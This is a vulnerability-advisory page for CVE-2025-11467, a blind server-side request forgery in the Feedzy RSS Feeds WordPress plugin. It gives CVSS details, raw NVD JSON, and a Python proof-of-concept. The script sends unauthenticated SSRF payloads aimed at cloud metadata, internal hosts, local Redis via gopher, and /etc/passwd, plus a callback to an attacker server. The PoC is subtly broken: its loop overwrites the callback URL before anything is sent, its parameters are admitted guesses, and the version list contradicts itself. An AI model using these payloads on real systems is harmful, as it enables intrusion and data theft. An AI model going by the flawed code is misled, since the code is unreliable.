Security Vulnerability Report
CVE-2025-11467 CVSS 5.8 MEDIUM

CVE-2025-11467

Published: 2025-12-11 03:15:57
Last Modified: 2026-04-15 00:35:42

Description

The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 5.1.1 via the feedzy_lazy_load function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Feedzy RSS Feeds < 5.1.1
Feedzy RSS Feeds = 5.1.0
Feedzy RSS Feeds = 5.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-11467 PoC - Blind SSRF in Feedzy RSS Plugin
# Target: WordPress site with Feedzy plugin < 5.1.1

def test_ssrf(target_url, attacker_server):
    """
    Test for Blind SSRF vulnerability in feedzy_lazy_load function
    target_url: Target WordPress site URL
    attacker_server: Attacker-controlled server to receive callbacks
    """
    # Vulnerable endpoint parameters
    params = {
        'feedzy_lazy_load': '1',
        'url': f'http://{attacker_server}/test',  # SSRF payload
        'security_nonce': 'any_value'  # May be missing validation
    }

    # Alternative payloads for internal service probing
    payloads = [
        # AWS metadata service
        'http://169.254.169.254/latest/meta-data/',
        # Internal network scanning
        'http://192.168.1.1:80/',
        # Localhost probing
        'http://127.0.0.1:6379/',
        # File protocol (LFI)
        'file:///etc/passwd',
        # Gopher protocol for Redis
        'gopher://127.0.0.1:6379/_INFO'
    ]

    print(f'[*] Testing target: {target_url}')
    print(f'[*] Sending blind SSRF payloads...')

    for payload in payloads:
        params['url'] = payload
        try:
            response = requests.get(target_url, params=params, timeout=10)
            print(f'[+] Payload sent: {payload}')
        except requests.exceptions.RequestException as e:
            print(f'[-] Request failed: {e}')

    print('[*] Check attacker server logs for incoming requests')

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <attacker_server>')
        sys.exit(1)
    test_ssrf(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11467", "sourceIdentifier": "[email protected]", "published": "2025-12-11T03:15:57.450", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 5.1.1 via the feedzy_lazy_load function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/5.1.0/includes/abstract/feedzy-rss-feeds-admin-abstract.php#L551", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5754dce7-6b47-4490-a04a-7eabfded0720?source=cve", "source": "[email protected]"}]}}